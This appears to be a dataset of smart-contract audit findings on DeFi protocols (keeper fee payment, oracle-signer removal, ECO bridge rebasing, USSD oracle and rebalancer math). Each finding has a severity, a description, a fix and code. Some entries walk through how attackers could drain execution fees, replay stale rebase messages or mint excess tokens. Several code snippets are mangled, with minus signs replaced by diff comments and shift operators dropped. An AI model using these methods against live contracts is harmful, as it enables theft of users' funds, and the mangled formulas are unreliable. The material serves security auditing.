(executionFeeForKeeper > executionFee) {\\n executionFeeForKeeper = executionFee;\\n }\\n\\n bank.transferOutNativeToken(\\n keeper,\\n executionFeeForKeeper\\n );\\n\\n emitKeeperExecutionFee(eventEmitter, keeper, executionFeeForKeeper);\\n\\n uint256 refundFeeAmount = executionFee // Remove the line below\\n executionFeeForKeeper;\\n if (refundFeeAmount == 0) {\\n return;\\n }\\n\\n bank.transferOutNativeToken(\\n user,\\n refundFeeAmount\\n );\\n\\n emitExecutionFeeRefund(eventEmitter, user, refundFeeAmount);\\n }\\n```\\n\\nA malicious keeper can exploit this issue to drain out all execution fee, regardless of the actual execution cost. Let's take `executeDeposit()` operation as an example to show how it works:\\n```\\nFile: contracts\\exchange\\DepositHandler.sol\\n function executeDeposit(\\n bytes32 key,\\n OracleUtils.SetPricesParams calldata oracleParams\\n ) external\\n globalNonReentrant\\n onlyOrderKeeper\\n withOraclePrices(oracle, dataStore, eventEmitter, oracleParams)\\n {\\n uint256 startingGas = gasleft();\\n\\n try this._executeDeposit(\\n key,\\n oracleParams,\\n msg.sender\\n ) {\\n } catch (bytes memory reasonBytes) {\\n// rest of code\\n }\\n }\\n\\nFile: contracts\\exchange\\DepositHandler.sol\\n function _executeDeposit(\\n bytes32 key,\\n OracleUtils.SetPricesParams memory oracleParams,\\n address keeper\\n ) external onlySelf {\\n uint256 startingGas = gasleft();\\n// rest of code\\n\\n ExecuteDepositUtils.executeDeposit(params);\\n }\\n\\n\\nFile: contracts\\deposit\\ExecuteDepositUtils.sol\\n function executeDeposit(ExecuteDepositParams memory params) external {\\n// rest of code\\n\\n GasUtils.payExecutionFee(\\n params.dataStore,\\n params.eventEmitter,\\n params.depositVault,\\n deposit.executionFee(),\\n params.startingGas,\\n params.keeper,\\n deposit.account()\\n );\\n }\\n\\nFile: contracts\\gas\\GasUtils.sol\\n function payExecutionFee(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n StrictBank bank,\\n uint256 executionFee,\\n uint256 startingGas,\\n address keeper,\\n address user\\n ) external {\\n uint256 gasUsed = startingGas - gasleft();\\n uint256 executionFeeForKeeper = adjustGasUsage(dataStore, gasUsed) * tx.gasprice;\\n\\n if (executionFeeForKeeper > executionFee) {\\n executionFeeForKeeper = executionFee;\\n }\\n\\n bank.transferOutNativeToken(\\n keeper,\\n executionFeeForKeeper\\n );\\n\\n emitKeeperExecutionFee(eventEmitter, keeper, executionFeeForKeeper);\\n\\n uint256 refundFeeAmount = executionFee - executionFeeForKeeper;\\n if (refundFeeAmount == 0) {\\n return;\\n }\\n\\n bank.transferOutNativeToken(\\n user,\\n refundFeeAmount\\n );\\n\\n emitExecutionFeeRefund(eventEmitter, user, refundFeeAmount);\\n }\\n\\nFile: contracts\\gas\\GasUtils.sol\\n function adjustGasUsage(DataStore dataStore, uint256 gasUsed) internal view returns (uint256) {\\n// rest of code\\n uint256 baseGasLimit = dataStore.getUint(Keys.EXECUTION_GAS_FEE_BASE_AMOUNT);\\n// rest of code\\n uint256 multiplierFactor = dataStore.getUint(Keys.EXECUTION_GAS_FEE_MULTIPLIER_FACTOR);\\n uint256 gasLimit = baseGasLimit + Precision.applyFactor(gasUsed, multiplierFactor);\\n return gasLimit;\\n }\\n```\\n\\nTo simplify the problem, given\\n```\\nEXECUTION_GAS_FEE_BASE_AMOUNT = 0\\nEXECUTION_GAS_FEE_MULTIPLIER_FACTOR = 1\\nexecutionFeeUserHasPaid = 200K Gwei\\ntx.gasprice = 1 Gwei\\nactualUsedGas = 100K\\n```\\n\\n`actualUsedGas` is the gas cost since startingGas(L146 of DepositHandler.sol) but before calling payExecutionFee()(L221 of ExecuteDepositUtils.sol)\\nLet's say, the keeper sets `tx.gaslimit` to make\\n```\\nstartingGas = 164K\\n```\\n\\nThen the calculation of `gasUsed`, L55 of `GasUtils.sol`, would be\\n```\\nuint256 gasUsed = startingGas - gasleft() = 164K - (164K - 100K) * 63 / 64 = 101K\\n```\\n\\nand\\n```\\nexecutionFeeForKeeper = 101K * tx.gasprice = 101K * 1 Gwei = 101K Gwei\\nrefundFeeForUser = 200K - 101K = 99K Gwei\\n```\\n\\nAs setting of `tx.gaslimit` doesn't affect the actual gas cost of the whole transaction, the excess gas will be refunded to `msg.sender`. Now, the keeper increases `tx.gaslimit` to make `startingGas = 6500K`, the calculation of `gasUsed` would be\\n```\\nuint256 gasUsed = startingGas - gasleft() = 6500K - (6500K - 100K) * 63 / 64 = 200K\\n```\\n\\nand\\n```\\nexecutionFeeForKeeper = 200K * tx.gasprice = 200K * 1 Gwei = 200K Gwei\\nrefundFeeForUser = 200K - 200K = 0 Gwei\\n```\\n\\nWe can see the keeper successfully drain out all execution fee, the user gets nothing refunded.чThe description in `Vulnerability Detail` section has been simplified. In fact, `gasleft` value should be adjusted after each external call during the whole call stack, not just in `payExecutionFee()`.чKeepers can steal additional execution fee from users.ч```\\nFile: contracts\\gas\\GasUtils.sol\\n function payExecutionFee(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n StrictBank bank,\\n uint256 executionFee,\\n uint256 startingGas,\\n address keeper,\\n address user\\n ) external { // @audit external call is subject to EIP// Remove the line below\\n150\\n// Remove the line below\\n uint256 gasUsed = startingGas // Remove the line below\\n gasleft();\\n// Add the line below\\n uint256 gasUsed = startingGas // Remove the line below\\n gasleft() * 64 / 63; // @audit the correct formula\\n uint256 executionFeeForKeeper = adjustGasUsage(dataStore, gasUsed) * tx.gasprice;\\n\\n if (executionFeeForKeeper > executionFee) {\\n executionFeeForKeeper = executionFee;\\n }\\n\\n bank.transferOutNativeToken(\\n keeper,\\n executionFeeForKeeper\\n );\\n\\n emitKeeperExecutionFee(eventEmitter, keeper, executionFeeForKeeper);\\n\\n uint256 refundFeeAmount = executionFee // Remove the line below\\n executionFeeForKeeper;\\n if (refundFeeAmount == 0) {\\n return;\\n }\\n\\n bank.transferOutNativeToken(\\n user,\\n refundFeeAmount\\n );\\n\\n emitExecutionFeeRefund(eventEmitter, user, refundFeeAmount);\\n }\\n```\\n -An Oracle Signer can never be removed even if he becomes maliciousчmediumчThe call flow of removeOracleSIgner incorrectly compares the hash of (\"removeOracleSigner\", account) with the hash of (\"addOracleSigner\", account) for validating that an action is actually initiated. This validation always fails because the hashes can never match.\\nThe process of removing oracle signers is 2 stage. First function `signalRemoveOracleSigner` is called by the TimelockAdmin which stores a time-delayed timestamp corresponding to the keccak256 hash of (\"removeOracleSigner\", account) - a bytes32 value called actionKey in the pendingActions mapping.\\nThen the Admin needs to call function `removeOracleSignerAfterSignal` but this function calls `_addOracleSignerActionKey` instead of `_removeOracleSignerActionKey` for calculating the bytes32 action key value. Now the actionKey is calculated as keccak256 hash of (\"addOracleSigner\", account) and this hash is used for checking if this action is actually pending by ensuring its timestamp is not zero inside the `_validateAction` function called via `_validateAndClearAction` function at Line 122. The hash of (\"removeOracleSigner\", account) can never match hash of (\"addOracleSigner\", account) and thus this validation will fail.\\n```\\n function removeOracleSignerAfterSignal(address account) external onlyTimelockAdmin nonReentrant {\\n bytes32 actionKey = _addOracleSignerActionKey(account);\\n _validateAndClearAction(actionKey, \"removeOracleSigner\");\\n\\n oracleStore.removeSigner(account);\\n\\n EventUtils.EventLogData memory eventData;\\n eventData.addressItems.initItems(1);\\n eventData.addressItems.setItem(0, \"account\", account);\\n eventEmitter.emitEventLog1(\\n \"RemoveOracleSigner\",\\n actionKey,\\n eventData\\n );\\n }\\n```\\nчReplace the call to _addOracleSignerActionKey at Line 118 by call to _removeOracleSignerActionKeyчThe process of removing an Oracle Signer will always revert and this breaks an important safety measure if a certain oracle signer becomes malicious the TimelockAdmin could do nothing(these functions are meant for this). Hence, important functionality is permanently broken.ч```\\n function removeOracleSignerAfterSignal(address account) external onlyTimelockAdmin nonReentrant {\\n bytes32 actionKey = _addOracleSignerActionKey(account);\\n _validateAndClearAction(actionKey, \"removeOracleSigner\");\\n\\n oracleStore.removeSigner(account);\\n\\n EventUtils.EventLogData memory eventData;\\n eventData.addressItems.initItems(1);\\n eventData.addressItems.setItem(0, \"account\", account);\\n eventEmitter.emitEventLog1(\\n \"RemoveOracleSigner\",\\n actionKey,\\n eventData\\n );\\n }\\n```\\n -Stale inflationMultiplier in L1ECOBridgeчhighч`L1ECOBridge::inflationMultiplier` is updated through `L1ECOBridge::rebase` on Ethereum, and it is used in `_initiateERC20Deposit` and `finalizeERC20Withdrawal` to convert between token amount and `_gonsAmount`. However, if `rebase` is not called in a timely manner, the `inflationMultiplier` value can be stale and inconsistent with the value of L1 ECO token during transfer, leading to incorrect token amounts in deposit and withdraw.\\nThe `inflationMultiplier` value is updated in `rebase` with an independent transaction on L1 as shown below:\\n```\\n function rebase(uint32 _l2Gas) external {\\n inflationMultiplier = IECO(l1Eco).getPastLinearInflation(block.number);\\n```\\n\\nHowever, in both `_initiateERC20Deposit`, `transferFrom` is called before the `inflationMultiplier` is used, which can lead to inconsistent results if `rebase` is not called on time for the `inflationMultiplier` to be updated. The code snippet for `_initiateERC20Deposit` is as follows:\\n```\\n IECO(_l1Token).transferFrom(_from, address(this), _amount);\\n _amount = _amount * inflationMultiplier;\\n```\\n\\n`finalizeERC20Withdrawal` has the same problem.\\n```\\n uint256 _amount = _gonsAmount / inflationMultiplier;\\n bytes memory _ecoTransferMessage = abi.encodeWithSelector(IERC20.transfer.selector,_to,_amount);\\n```\\n\\nThe same problem does not exist in L2ECOBridge. Because the L2 rebase function updates inflationMultiplier and rebase l2Eco token synchronously.\\n```\\n function rebase(uint256 _inflationMultiplier)\\n external\\n virtual\\n onlyFromCrossDomainAccount(l1TokenBridge)\\n validRebaseMultiplier(_inflationMultiplier)\\n {\\n inflationMultiplier = _inflationMultiplier;\\n l2Eco.rebase(_inflationMultiplier);\\n emit RebaseInitiated(_inflationMultiplier);\\n }\\n```\\nчCalling `IECO(l1Eco).getPastLinearInflation(block.number)` instead of using `inflationMultiplier`.чThe attacker can steal tokens with this.\\nHe can deposit to L1 bridge when he observes a stale larger value and he will receive more tokens on L2.ч```\\n function rebase(uint32 _l2Gas) external {\\n inflationMultiplier = IECO(l1Eco).getPastLinearInflation(block.number);\\n```\\n -Malicious actor cause rebase to an old inflation multiplierчhighчThe protocol has a rebasing mechanism that allows to sync the inflation multiplier between both L1 and L2 chains. The call to rebase is permissionless (anyone can trigger it). Insufficant checks allow a malicious actor to rebase to an old value.\\n```\\n function rebase(uint32 _l2Gas) external {\\n inflationMultiplier = IECO(l1Eco).getPastLinearInflation(\\n block.number\\n );\\n\\n bytes memory message = abi.encodeWithSelector(\\n IL2ECOBridge.rebase.selector,\\n inflationMultiplier\\n );\\n\\n sendCrossDomainMessage(l2TokenBridge, _l2Gas, message);\\n }\\n```\\n\\nA malicious actor can call this function a large amount of times to queue messages on `L2CrossDomainMessenger`. Since it is expensive to execute so much messages from `L2CrossDomainMessenger` (especially if the malicious actor sets `_l2Gas` to a high value) there will be a rebase message that will not be relayed through `L2CrossDomainMessenger` (or in failedMessages array).\\nSome time passes and other legitimate rebase transactions get executed.\\nOne day the malicious actor can execute one of his old rebase messages and set the value to the old value. The attacker will debalance the scales between L1 and L2 and can profit from it.чWhen sending a rebase from L1, include in the message the L1 block number. In L2 rebase, validate that the new rebase block number is above previous block numberчdebalance the scales between L1 and L2 ECO tokenч```\\n function rebase(uint32 _l2Gas) external {\\n inflationMultiplier = IECO(l1Eco).getPastLinearInflation(\\n block.number\\n );\\n\\n bytes memory message = abi.encodeWithSelector(\\n IL2ECOBridge.rebase.selector,\\n inflationMultiplier\\n );\\n\\n sendCrossDomainMessage(l2TokenBridge, _l2Gas, message);\\n }\\n```\\n -`StableOracleDAI` calculates `getPriceUSD` with inverted base/rate tokens for Chainlink priceчhighч`StableOracleDAI::getPriceUSD()` calculates the average price between the Uniswap pool price for a pair and the Chainlink feed as part of its result.\\nThe problem is that it uses `WETH/DAI` as the base/rate tokens for the pool, and `DAI/ETH` for the Chainlink feed, which is the opposite.\\nThis will incur in a huge price difference that will impact on the amount of USSD tokens being minted, while requesting the price from this oracle.\\nIn `StableOracleDAI::getPrice()` the `price` from the Chainlink feed `priceFeedDAIETH` returns the `price` as DAI/ETH.\\nThis can be checked on Etherscan and the Chainlink Feeds Page.\\nAlso note the comment on the code is misleading, as it is refering to another pair:\\nchainlink price data is 8 decimals for WETH/USD\\n```\\n/// constructor\\n priceFeedDAIETH = AggregatorV3Interface(\\n 0x773616E4d11A78F511299002da57A0a94577F1f4\\n );\\n\\n/// getPrice()\\n // chainlink price data is 8 decimals for WETH/USD, so multiply by 10 decimals to get 18 decimal fractional\\n //(uint80 roundID, int256 price, uint256 startedAt, uint256 timeStamp, uint80 answeredInRound) = priceFeedDAIETH.latestRoundData();\\n (, int256 price, , , ) = priceFeedDAIETH.latestRoundData();\\n```\\n\\nLink to code\\nOn the other hand, the price coming from the Uniswap pool `DAIWethPrice` returns the price as `WETH/DAI`.\\nNote that the relation WETH/DAI is given by the orders of the token addresses passed as arguments, being the first the base token, and the second the quote token.\\nAlso note that the variable name `DAIWethPrice` is misleading as well as the base/rate are the opposite (although this doesn't affect the code).\\n```\\n uint256 DAIWethPrice = DAIEthOracle.quoteSpecificPoolsWithTimePeriod(\\n 1000000000000000000, // 1 Eth\\n 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, // WETH (base token) // @audit\\n 0x6B175474E89094C44Da98b954EedeAC495271d0F, // DAI (quote token) // @audit\\n pools, // DAI/WETH pool uni v3\\n 600 // period\\n );\\n```\\n\\nLink to code\\nFinally, both values are used to calculate an average price of in `((DAIWethPrice + uint256(price) * 1e10) / 2)`.\\nBut as seen, one has price in `DAI/ETH` and the other one in `WETH/DAI`, which leads to an incorrect result.\\n```\\n return\\n (wethPriceUSD * 1e18) /\\n ((DAIWethPrice + uint256(price) * 1e10) / 2);\\n```\\n\\nLink to code\\nThe average will be lower in this case, and the resulting price higher.\\nThis will be used by `USSD::mintForToken()` for calculating the amount of tokens to mint for the user, and thus giving them much more than they should.\\nAlso worth mentioning that `USSDRebalancer::rebalance()` also relies on the result of this price calculation and will make it perform trades with incorrect values.чCalculate the inverse of the `price` returned by the Chainlink feed so that it can be averaged with the pool `price`, making sure that both use the correct `WETH/DAI` and `ETH/DAI` base/rate tokens.чUsers will receive far more USSD tokens than they should when they call `mintForToken()`, ruining the token value.\\nWhen performed the `USSDRebalancer::rebalance()`, all the calculations will be broken for the DAI oracle, leading to incorrect pool trades due to the error in `getPrice()`ч```\\n/// constructor\\n priceFeedDAIETH = AggregatorV3Interface(\\n 0x773616E4d11A78F511299002da57A0a94577F1f4\\n );\\n\\n/// getPrice()\\n // chainlink price data is 8 decimals for WETH/USD, so multiply by 10 decimals to get 18 decimal fractional\\n //(uint80 roundID, int256 price, uint256 startedAt, uint256 timeStamp, uint80 answeredInRound) = priceFeedDAIETH.latestRoundData();\\n (, int256 price, , , ) = priceFeedDAIETH.latestRoundData();\\n```\\n -`USSDRebalancer.sol#SellUSSDBuyCollateral` the check of whether collateral is DAI is wrongчhighчThe `SellUSSDBuyCollateral` function use `||` instand of `&&` to check whether the collateral is DAI. It is wrong and may cause `SellUSSDBuyCollateral` function revert.\\n```\\n196 for (uint256 i = 0; i < collateral.length; i++) {\\n197 uint256 collateralval = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * 1e18 / (10**IERC20MetadataUpgradeable(collateral[i].token).decimals()) * collateral[i].oracle.getPriceUSD() / 1e18;\\n198 if (collateralval * 1e18 / ownval < collateral[i].ratios[flutter]) {\\n199 if (collateral[i].token != uniPool.token0() || collateral[i].token != uniPool.token1()) {\\n200 // don't touch DAI if it's needed to be bought (it's already bought)\\n201 IUSSD(USSD).UniV3SwapInput(collateral[i].pathbuy, daibought/portions);\\n202 }\\n203 }\\n204 }\\n```\\n\\nLine 199 should use `&&` instand of `||` to ensure that the token is not DAI. If the token is DAI, the `UniV3SwapInput` function will revert because that DAI's `pathbuy` is empty.ч```\\n for (uint256 i = 0; i < collateral.length; i// Add the line below\\n// Add the line below\\n) {\\n uint256 collateralval = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * 1e18 / (10**IERC20MetadataUpgradeable(collateral[i].token).decimals()) * collateral[i].oracle.getPriceUSD() / 1e18;\\n if (collateralval * 1e18 / ownval < collateral[i].ratios[flutter]) {\\n// Remove the line below\\n if (collateral[i].token != uniPool.token0() || collateral[i].token != uniPool.token1()) {\\n// Add the line below\\n if (collateral[i].token != uniPool.token0() && collateral[i].token != uniPool.token1()) {\\n // don't touch DAI if it's needed to be bought (it's already bought)\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathbuy, daibought/portions);\\n }\\n }\\n }\\n```\\nчThe `SellUSSDBuyCollateral` will revert and USSD will become unstable.ч```\\n196 for (uint256 i = 0; i < collateral.length; i++) {\\n197 uint256 collateralval = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * 1e18 / (10**IERC20MetadataUpgradeable(collateral[i].token).decimals()) * collateral[i].oracle.getPriceUSD() / 1e18;\\n198 if (collateralval * 1e18 / ownval < collateral[i].ratios[flutter]) {\\n199 if (collateral[i].token != uniPool.token0() || collateral[i].token != uniPool.token1()) {\\n200 // don't touch DAI if it's needed to be bought (it's already bought)\\n201 IUSSD(USSD).UniV3SwapInput(collateral[i].pathbuy, daibought/portions);\\n202 }\\n203 }\\n204 }\\n```\\n -The getOwnValuation() function contains errors in the price calculationчhighчThe getOwnValuation() function in the provided code has incorrect price calculation logic when token0() or token1() is equal to USSD. The error leads to inaccurate price calculations.\\nThe `USSDRebalancer.getOwnValuation()` function calculates the price based on the sqrtPriceX96 value obtained from the uniPool.slot0() function. The calculation depends on whether token0() is equal to USSD or not. If token0() is equal to USSD, the price calculation is performed as follows:\\n```\\n price = uint(sqrtPriceX96)*(uint(sqrtPriceX96))/(1e6) (96 * 2);\\n```\\n\\nHowever,there is an error in the price calculation logic. The calculation should be:\\n```\\nprice = uint(sqrtPriceX96) * uint(sqrtPriceX96) * 1e6 (96 * 2);\\n```\\n\\nIf token0() is not equal to USSD, the price calculation is slightly different:\\n```\\n price = uint(sqrtPriceX96)*(uint(sqrtPriceX96))*(1e18 /* 1e12 + 1e6 decimal representation */) (96 * 2);\\n // flip the fraction\\n price = (1e24 / price) / 1e12;\\n```\\n\\nThe calculation should be:\\n```\\n price = uint(sqrtPriceX96)*(uint(sqrtPriceX96))*(1e6 /* 1e12 + 1e6 decimal representation */) (96 * 2);\\n // flip the fraction\\n price = (1e24 / price) / 1e12;\\n```\\nчWhen token0() is USSD, the correct calculation should be uint(sqrtPriceX96) * uint(sqrtPriceX96) * 1e6 >> (96 * 2). When token1() is USSD, the correct calculation should be\\n```\\nprice = uint(sqrtPriceX96)*(uint(sqrtPriceX96))*(1e6 /* 1e12 + 1e6 decimal representation */) (96 * 2);\\n // flip the fraction\\n price = (1e24 / price) / 1e12;\\n```\\nчThe incorrect price calculation in the getOwnValuation() function can lead to significant impact on the valuation of assets in the UniSwap V3 pool. The inaccurate prices can result in incorrect asset valuations, which may affect trading decisions, liquidity provision, and overall financial calculations based on the UniSwap V3 pool.ч```\\n price = uint(sqrtPriceX96)*(uint(sqrtPriceX96))/(1e6) (96 * 2);\\n```\\n -The price from `StableOracleDAI` is returned with the incorrect number of decimalsчhighчThe price returned from the `getPriceUSD` function of the `StableOracleDAI` is scaled up by `1e10`, which results in 28 decimals instead of the intended 18.\\nIn `StableOracleDAI` the `getPriceUSD` function is defined as follows...\\n```\\n function getPriceUSD() external view override returns (uint256) {\\n address[] memory pools = new address[](1);\\n pools[0] = 0x60594a405d53811d3BC4766596EFD80fd545A270;\\n uint256 DAIWethPrice = DAIEthOracle.quoteSpecificPoolsWithTimePeriod(\\n 1000000000000000000, // 1 Eth\\n 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, // WETH (base token)\\n 0x6B175474E89094C44Da98b954EedeAC495271d0F, // DAI (quote token)\\n pools, // DAI/WETH pool uni v3\\n 600 // period\\n );\\n\\n uint256 wethPriceUSD = ethOracle.getPriceUSD();\\n\\n // chainlink price data is 8 decimals for WETH/USD, so multiply by 10 decimals to get 18 decimal fractional\\n //(uint80 roundID, int256 price, uint256 startedAt, uint256 timeStamp, uint80 answeredInRound) = priceFeedDAIETH.latestRoundData();\\n (, int256 price,,,) = priceFeedDAIETH.latestRoundData();\\n\\n return (wethPriceUSD * 1e18) / ((DAIWethPrice + uint256(price) * 1e10) / 2);\\n }\\n```\\n\\nThe assumption is made that the `DAIWethPrice` is 8 decimals, and is therefore multiplied by `1e10` in the return statement to scale it up to 18 decimals.\\nThe other price feeds used in the protocol are indeed received with decimals, however, the Chainlink DAI/ETH price feed returns a value with 18 decimals as can be seen on their site.чRemove the `* 1e10` from the return statement.\\n```\\n// Remove the line below\\n return (wethPriceUSD * 1e18) / ((DAIWethPrice // Add the line below\\n uint256(price) * 1e10) / 2);\\n// Add the line below\\n return (wethPriceUSD * 1e18) / (DAIWethPrice // Add the line below\\n uint256(price) / 2);\\n```\\nчThis means that the price returned from the `getPriceUSD` function is scaled up by `1e10`, which results in 28 decimals instead of the intended 18, drastically overvaluing the DAI/USD price.\\nThis will result in the USSD token price being a tiny fraction of what it is intended to be. Instead of being pegged to $1, it will be pegged to $0.0000000001, completely defeating the purpose of the protocol.\\nFor example, if a user calls `USSD.mintForToken`, supplying DAI, they'll be able to mint `1e10` times more USSD than intended.ч```\\n function getPriceUSD() external view override returns (uint256) {\\n address[] memory pools = new address[](1);\\n pools[0] = 0x60594a405d53811d3BC4766596EFD80fd545A270;\\n uint256 DAIWethPrice = DAIEthOracle.quoteSpecificPoolsWithTimePeriod(\\n 1000000000000000000, // 1 Eth\\n 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, // WETH (base token)\\n 0x6B175474E89094C44Da98b954EedeAC495271d0F, // DAI (quote token)\\n pools, // DAI/WETH pool uni v3\\n 600 // period\\n );\\n\\n uint256 wethPriceUSD = ethOracle.getPriceUSD();\\n\\n // chainlink price data is 8 decimals for WETH/USD, so multiply by 10 decimals to get 18 decimal fractional\\n //(uint80 roundID, int256 price, uint256 startedAt, uint256 timeStamp, uint80 answeredInRound) = priceFeedDAIETH.latestRoundData();\\n (, int256 price,,,) = priceFeedDAIETH.latestRoundData();\\n\\n return (wethPriceUSD * 1e18) / ((DAIWethPrice + uint256(price) * 1e10) / 2);\\n }\\n```\\n -Wrong computation of the amountToSellUnit variableчhighчThe variable `amountToSellUnits` is computed wrongly in the code which will lead to an incorrect amount of collateral to be sold.\\nThe `BuyUSSDSellCollateral()` function is used to sell collateral during a peg-down recovery event. The computation of the amount to sell is computed using the following formula:\\n```\\n// @audit-issue Wrong computation\\nuint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n```\\n\\nThe idea is to sell an amount which is equivalent (in USD) to the ratio of `amountToBuyLeftUSD / collateralval`. Flattening the equation it ends up as:\\n```\\nuint256 amountToSellUnits = (collateralBalance * amountToBuyLeftUSD * 1e18) / (collateralval * 1e18 * 1e18);\\n\\n// Reducing the equation\\nuint256 amountToSellUnits = (collateralBalance * amountToBuyLeftUSD) / (collateralval * 1e18);\\n```\\n\\n`amountToBuyLeftUSD` and `collateralval` already have 18 decimals so their decimals get cancelled together which will lead the last 1e18 factor as not necessary.чIssue Wrong computation of the amountToSellUnit variable\\nDelete the last 1e18 factorчThe contract will sell an incorrect amount of collateral during a peg-down recovery event.ч```\\n// @audit-issue Wrong computation\\nuint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n```\\n -Calls to Oracles don't check for stale pricesчmediumчCalls to Oracles don't check for stale prices.\\nNone of the oracle calls check for stale prices, for example StableOracleDAI.getPriceUSD():\\n```\\n(, int256 price, , , ) = priceFeedDAIETH.latestRoundData();\\n\\nreturn\\n (wethPriceUSD * 1e18) /\\n ((DAIWethPrice + uint256(price) * 1e10) / 2);\\n```\\nчRead the `updatedAt` parameter from the calls to `latestRoundData()` and verify that it isn't older than a set amount, eg:\\n```\\nif (updatedAt < block.timestamp - 60 * 60 /* 1 hour */) {\\n revert(\"stale price feed\");\\n}\\n```\\nчOracle price feeds can become stale due to a variety of reasons. Using a stale price will result in incorrect calculations in most of the key functionality of USSD & USSDRebalancer contracts.ч```\\n(, int256 price, , , ) = priceFeedDAIETH.latestRoundData();\\n\\nreturn\\n (wethPriceUSD * 1e18) /\\n ((DAIWethPrice + uint256(price) * 1e10) / 2);\\n```\\n -rebalance process incase of selling the collateral, could revert because of underflow calculationчmediumчrebalance process, will try to sell the collateral in case of peg-down. However, the process can revert because the calculation can underflow.\\nInside `rebalance()` call, if `BuyUSSDSellCollateral()` is triggered, it will try to sell the current collateral to `baseAsset`. The asset that will be sold (amountToSellUnits) first calculated. Then swap it to `baseAsset` via uniswap. However, when subtracting `amountToBuyLeftUSD`, it with result of `(IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)`. There is no guarantee `amountToBuyLeftUSD` always bigger than `(IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)`.\\nThis causing the call could revert in case `(IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)` > `amountToBuyLeftUSD`.\\nThere are two branch where `amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)` is performed :\\nIncase `collateralval > amountToBuyLeftUSD`\\n`collateralval` is calculated using oracle price, thus the result of swap not guaranteed to reflect the proportion of `amountToBuyLefUSD` against `collateralval` ratio, and could result in returning `baseAsset` larger than expected. And potentially `(IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)` > `amountToBuyLeftUSD`\\n```\\n uint256 collateralval = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * 1e18 / (10**IERC20MetadataUpgradeable(collateral[i].token).decimals()) * collateral[i].oracle.getPriceUSD() / 1e18;\\n if (collateralval > amountToBuyLeftUSD) {\\n // sell a portion of collateral and exit\\n if (collateral[i].pathsell.length > 0) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n uint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, amountToSellUnits);\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n } else {\\n```\\n\\nIncase `collateralval < amountToBuyLeftUSD`\\nThis also can't guarantee `(IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)` < `amountToBuyLeftUSD`.\\n```\\n if (collateralval >= amountToBuyLeftUSD / 20) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n // sell all collateral and move to next one\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, IERC20Upgradeable(collateral[i].token).balanceOf(USSD));\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n }\\n```\\nчCheck if `(IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore)` > `amountToBuyLeftUSD`, in that case, just set `amountToBuyLeftUSD` to 0.\\n```\\n // rest of code\\n uint baseAssetChange = IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n if (baseAssetChange > amountToBuyLeftUSD) {\\n amountToBuyLeftUSD = 0;\\n } else {\\n amountToBuyLeftUSD -= baseAssetChange;\\n }\\n DAItosell += baseAssetChange;\\n // rest of code\\n```\\nчRebalance process can revert caused by underflow calculation.ч```\\n uint256 collateralval = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * 1e18 / (10**IERC20MetadataUpgradeable(collateral[i].token).decimals()) * collateral[i].oracle.getPriceUSD() / 1e18;\\n if (collateralval > amountToBuyLeftUSD) {\\n // sell a portion of collateral and exit\\n if (collateral[i].pathsell.length > 0) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n uint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, amountToSellUnits);\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n } else {\\n```\\n -StableOracleWBTC use BTC/USD chainlink oracle to price WBTC which is problematic if WBTC depegsчmediumчThe StableOracleWBTC contract utilizes a BTC/USD Chainlink oracle to determine the price of WBTC. However, this approach can lead to potential issues if WBTC were to depeg from BTC. In such a scenario, WBTC would no longer maintain an equivalent value to BTC. This can result in significant problems, including borrowing against a devalued asset and the accumulation of bad debt. Given that the protocol continues to value WBTC based on BTC/USD, the issuance of bad loans would persist, exacerbating the overall level of bad debt.\\nImportant to note that this is like a 2 in 1 report as the same idea could work on the StableOracleWBGL contract too.\\nThe vulnerability lies in the reliance on a single BTC/USD Chainlink oracle to obtain the price of WBTC. If the bridge connecting WBTC to BTC becomes compromised and WBTC depegs, WBTC may depeg from BTC. Consequently, WBTC's value would no longer be equivalent to BTC, potentially rendering it worthless (hopefully this never happens). The use of the BTC/USD oracle to price WBTC poses risks to the protocol and its users.\\nThe following code snippet represents the relevant section of the 